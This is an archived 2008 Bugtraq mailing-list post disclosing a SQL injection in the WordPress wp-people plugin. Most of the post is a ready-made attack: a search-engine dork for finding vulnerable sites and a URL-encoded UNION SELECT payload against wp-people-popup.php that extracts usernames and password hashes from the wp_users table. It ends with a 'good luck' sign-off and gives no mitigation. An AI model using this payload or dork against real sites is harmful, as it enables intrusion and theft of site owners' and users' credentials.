lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20080216165209.9860.qmail@securityfocus.com> Date: 16 Feb 2008 16:52:09 -0000 From: hackturkiye.hackturkiye@...il.com To: bugtraq@...urityfocus.com Subject: Wordpress Plugin (wp-people) SQL Injection ######################################################################### # # Wordpress Plugin (wp-people) SQL Injection # ######################################################################### # # AUTHOR : S@BUN # # HOME : http://www.hackturkiye.com/ # ######################################################################### # # DORKS 1 : allinurl :"allinurl: "wp-people"" # ########################################################################## EXPLOIT : wp-content/plugins/wp-people/wp-people-popup.php?person=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cuser_pass%2Cuser_login%2C3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fwp_users ########################################################################## # S@BUN GOOD LUCKY S@BUN ##########################################################################